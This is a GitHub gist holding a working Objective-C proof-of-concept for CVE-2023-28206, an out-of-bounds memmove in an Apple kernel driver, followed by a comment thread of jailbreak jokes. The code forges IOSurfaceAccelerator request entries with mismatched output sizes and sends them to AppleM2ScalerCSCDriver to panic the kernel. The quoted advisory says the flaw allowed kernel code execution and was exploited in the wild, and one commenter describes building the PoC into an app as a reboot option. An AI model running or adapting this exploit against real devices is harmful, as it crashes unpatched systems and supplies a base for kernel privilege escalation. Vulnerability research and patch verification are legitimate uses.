@LinusHenze

LinusHenze/PoC.m Secret

Last active June 6, 2023 11:38
A PoC for CVE-2023-28206
//
// PoC.m
// IOSABugTrigger
//
// Created by Linus Henze on 2023-04-08.
// Copyright © 2023 Pinauten GmbH. Some rights reserved.
//
//
// This is a PoC for CVE-2023-28206, triggering an oob memmove in IosaColorManagerMSR8::getHDRStats_gatedContext
//
// License: MIT
//
#import <CoreFoundation/CoreFoundation.h>
#import <Foundation/Foundation.h>
#import <IOSurface/IOSurfaceTypes.h>
#import <IOSurface/IOSurfaceRef.h>
#import <IOKit/IOKitLib.h>
#import <stdio.h>
#import <assert.h>
#import <stdint.h>
#import <dlfcn.h>
// One entry of the per-request I/O descriptor array that the PoC overlays at
// offset 0xD0 of the 0x170-byte buffer filled in by
// prepareTransformBuffersAndOptions (see trigger_memmove_oob_copy). The layout
// is the author's reverse engineering of a private IOSurfaceAccelerator
// structure; the field meanings below are inferred from how the PoC fills
// them, not from any public header -- treat them as unconfirmed.
// NOTE(review): with natural alignment on LP64 this struct is 40 bytes, so
// apiDat[2] starts at 0xD0 + 80 = 0x120, still inside the 0x170 buffer.
struct CommApiData {
    uint32_t inType;    // set to 3 by the PoC for both entries used
    void *inBuf;        // user pointer to the input property blob (pwnData)
    uint32_t inBufSize; // byte length reported to the kernel for inBuf
    uint32_t outType;   // set to 2 by the PoC for both entries used
    void *outBuf;       // user pointer to the output buffer
    uint32_t outSize;   // byte length reported for outBuf; the PoC reports
                        // 0x1008 in entry 0 and 0 in entry 2 -- per the file
                        // header and L89/L95 comments this disagreement is what
                        // reaches the memmove out of bounds (CVE-2023-28206)
};
/// Signature, as reverse engineered by the author, of the private
/// IOSurfaceAccelerator helper `prepareTransformBuffersAndOptions`. The global
/// below is NULL until trigger_memmove_oob_copy() resolves it with dlsym();
/// the caller treats a zero return as success (it asserts on nonzero).
typedef uint64_t (*IOSAPrepareTransformBuffersAndOptionsFn)(IOSurfaceRef sourceSurface,
                                                            IOSurfaceRef destinationSurface,
                                                            CFDictionaryRef options,
                                                            bool unknownFlag,
                                                            void *requestBuffer);

IOSAPrepareTransformBuffersAndOptionsFn prepareTransformBuffersAndOptions;
// This function triggers an oob memmove in IosaColorManagerMSR8::getHDRStats_gatedContext
/// Never returns normally: every setup failure aborts via assert(), and the
/// final assert(false) fires if the kernel call comes back at all (i.e. on a
/// patched system). Apple's advisory text quoted in the comment thread lists
/// the fix ("improved input validation") as shipped in iOS/iPadOS 16.4.1,
/// iOS/iPadOS 15.7.5, macOS Ventura 13.3.1, Monterey 12.6.5 and Big Sur 11.7.6.
/// @return The kern_return_t of the struct-method call -- unreachable in practice.
kern_return_t trigger_memmove_oob_copy(void) {
    // Resolve the private IOSurfaceAccelerator helper at runtime. Neither the
    // dlopen() nor the dlsym() result is checked, so a missing library or
    // symbol turns the prepareTransformBuffersAndOptions(...) call below into
    // a NULL function-pointer call instead of a clean failure.
    void *iosaHndl = dlopen("/System/Library/PrivateFrameworks/IOSurfaceAccelerator.framework/IOSurfaceAccelerator", RTLD_NOW);
    prepareTransformBuffersAndOptions = dlsym(iosaHndl, "prepareTransformBuffersAndOptions");
    // One dictionary serves three roles: source surface description,
    // destination surface description, and the options passed to the helper.
    NSDictionary *dict = @{
        (__bridge NSString*) kIOSurfaceWidth: @1024,
        (__bridge NSString*) kIOSurfaceHeight: @1024,
        (__bridge NSString*) kIOSurfaceBytesPerElement: @4,
        (__bridge NSString*) kIOSurfaceBytesPerRow: @(1024 * 4),
        (__bridge NSString*) kIOSurfaceAllocSize: @(1024 * 1024 * 4),
        (__bridge NSString*) kIOSurfacePixelFormat: @((uint32_t) 'RGBA'),
        @"HDREnable": @YES,
        // This is required for some reason (author's note; why the helper
        // needs five UINT32_MAX bins is not established anywhere in this file)
        @"HistogramPixelBins": @[
            @UINT32_MAX,
            @UINT32_MAX,
            @UINT32_MAX,
            @UINT32_MAX,
            @UINT32_MAX
        ]
    };
    // Both surfaces come from the same description. Neither IOSurfaceCreate()
    // result is NULL-checked; the source is filled with a fixed 0xF0 byte
    // pattern so copied data is recognisable.
    IOSurfaceRef srcSurf = IOSurfaceCreate((__bridge CFDictionaryRef) dict);
    memset(IOSurfaceGetBaseAddress(srcSurf), 0xF0, 1024 * 1024 * 4);
    IOSurfaceRef destSurf = IOSurfaceCreate((__bridge CFDictionaryRef) dict);
    // Zeroed 0x170-byte request buffer that the helper populates and that is
    // later handed to the kernel verbatim as the struct-method input. Its
    // internal layout is opaque here; 0xD0 is the author's offset of the
    // CommApiData entry array -- TODO confirm against the framework binary.
    void *dataBuf = malloc(0x170);
    memset(dataBuf, 0, 0x170);
    uint64_t rr = prepareTransformBuffersAndOptions(srcSurf, destSurf, (__bridge CFDictionaryRef) dict, 0, dataBuf);
    assert(!rr); // the helper is assumed to return 0 on success
    struct CommApiData *apiDat = (struct CommApiData*) ((uintptr_t) dataBuf + 0xD0);
    // Tell the kernel we want to do some HDR stuff
    // Property blob: a two-word header (count, size) followed by two
    // tag/length/value triples. Only eight 32-bit words are written; the rest
    // of the 0x4000*4-byte allocation is left uninitialised even though the
    // full size is reported as inBufSize below.
    int i = 0;
    uint32_t *pwnData = malloc(0x4000 * 4); // Need to allocate enough space because otherwise...
    pwnData[i++] = 2; // Number of properties
    pwnData[i++] = 100; // Size of properties
    pwnData[i++] = 'base'; // Tag
    pwnData[i++] = 4; // Size of data for this tag
    pwnData[i++] = 0; // Value
    pwnData[i++] = 'basf'; // Tag
    pwnData[i++] = 4; // Size of data for this tag
    pwnData[i++] = 0; // Value
    // THIS IS THE REAL TRIGGER
    // Entries 0 and 2 describe the same input but disagree about the output
    // size: entry 0 advertises 0x1008 bytes (the stated minimum), entry 2
    // advertises zero. Per the file header, that mismatch is what drives the
    // memmove in IosaColorManagerMSR8::getHDRStats_gatedContext out of bounds.
    // Entry 1 is not touched here; it holds whatever the helper left in it.
    apiDat[0].inType = 3;
    apiDat[0].inBuf = pwnData;
    apiDat[0].inBufSize = 0x4000 * 4;
    apiDat[0].outType = 2;
    apiDat[0].outBuf = malloc(0x4000);
    apiDat[0].outSize = 0x1008; // Tell the kernel that we have 0x1008 bytes of space (this is the minimum)...
    apiDat[2].inType = 3;
    apiDat[2].inBuf = pwnData;
    apiDat[2].inBufSize = 0x4000 * 4;
    apiDat[2].outType = 2;
    apiDat[2].outBuf = malloc(0x4000);
    apiDat[2].outSize = 0; // ...and then replace the buffer with one of size zero!
    // Open a user client (type 0) on AppleM2ScalerCSCDriver and call struct
    // method selector 1 with the prepared request. Setup failures abort via
    // assert() rather than returning an error to the caller.
    io_service_t service = IOServiceGetMatchingService(kIOMainPortDefault, IOServiceMatching("AppleM2ScalerCSCDriver"));
    assert(service);
    io_connect_t conn = 0;
    kern_return_t kr = IOServiceOpen(service, mach_task_self_, 0, &conn);
    assert(kr == KERN_SUCCESS);
    assert(conn);
    IOObjectRelease(service);
    kr = IOConnectCallStructMethod(conn, 1, dataBuf, 0x170, NULL, NULL);
    // Kernel should have paniced at this point
    // If the call returns (expected on a patched system), the process aborts
    // here instead of reporting kr. `conn` is never closed and none of the
    // malloc()ed buffers or surfaces are released -- irrelevant for a crash
    // PoC, but it means `return kr` is dead code.
    assert(false);
    return kr;
}
@JanCraft

yo??? ios 16 jb eta s0n????

stfu

@WindowsNTXP

stfu

@llsc12

llsc12 commented Apr 10, 2023

yo??? ios 16 jb eta s0n????

stfu

@vmhl87

vmhl87 commented Apr 10, 2023

yo??? ios 16 jb eta s0n????

stfu

@DownBeatGnu7882

yo??? ios 16 jb eta s0n????

stfu

@1255691733

🐂🍺

@HellGateAI

stfu 🤭

yo??? ios 16 jb eta s0n????

stfu 🤭

@GeoSn0w

GeoSn0w commented Apr 10, 2023

yo??? ios 16 jb eta s0n????

stfu

@katyapms1

yo??? ios 16 jb eta s0n????

stfu

@qx-775

qx-775 commented Apr 10, 2023

yo??? ios 16 jb eta s0n????

stfu

@Tracker-Friendly

stfu

@strawbberrys

Work on IPhone 14 Pro Max Plus IOS 16.4.1 India?

@adelmehenni

yo??? ios 16 jb eta s0n????

stfu

@WazeHell

yo??? ios 16 jb eta s0n????

stfu

@SushiDesigner

yo??? ios 16 jb eta s0n????

stfu


@strawbberrys

Work on IPhone 14 Pro Max Plus IOS 16.4.1 India?

No, up to 16.4

16.4.1 India

@HirokazMogi

ド素人ですが、このコードはどうやってデバイスに書き込むのですか?

@circularsprojects

😭😭

@iarchiveml

Work on IPhone 14 Pro Max Plus IOS 16.4.1 India?

stfu

@PeanutStick

I love this community.

@dualra1n

amazing exploit with just 116 lines of code. so cool. thank you for the release

@PARKasd

PARKasd commented Apr 15, 2023

I love this community.

Except Dev, We all love this community

@Diowboss

yo??? ios 16 jb eta s0n????

Stfu

@KevinAlavik

Make an app with this now

@PARKasd

PARKasd commented Apr 22, 2023

Make an app with this now

In fact there is. But it only causes a kernel panic

@KevinAlavik

@PARKasd yeah thats what i want, but where is this app? i have seen twitter posts about it but havent seen any release, i might make one

@PARKasd

PARKasd commented Apr 29, 2023

@KevinAlavik You can use my loc change app too. It has reboot option with this PoC

@KevinAlavik

@KevinAlavik You can use my loc change app too. It has reboot option with this PoC

Alr

@Tracker-Friendly

is there any writeup about the bug?? How in the hell this bug is being triggered by only assigning apiDat[2] to zero since 0x1008 being minimum?

An out-of-bounds write issue was addressed with improved input validation. This issue is fixed in macOS Monterey 12.6.5, iOS 16.4.1 and iPadOS 16.4.1, iOS 15.7.5 and iPadOS 15.7.5, macOS Big Sur 11.7.6, macOS Ventura 13.3.1. An app may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited.

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28206

Check the damn CVE 🤣

@itsnebulalol

yo??? ios 16 jb eta s0n????

stfu
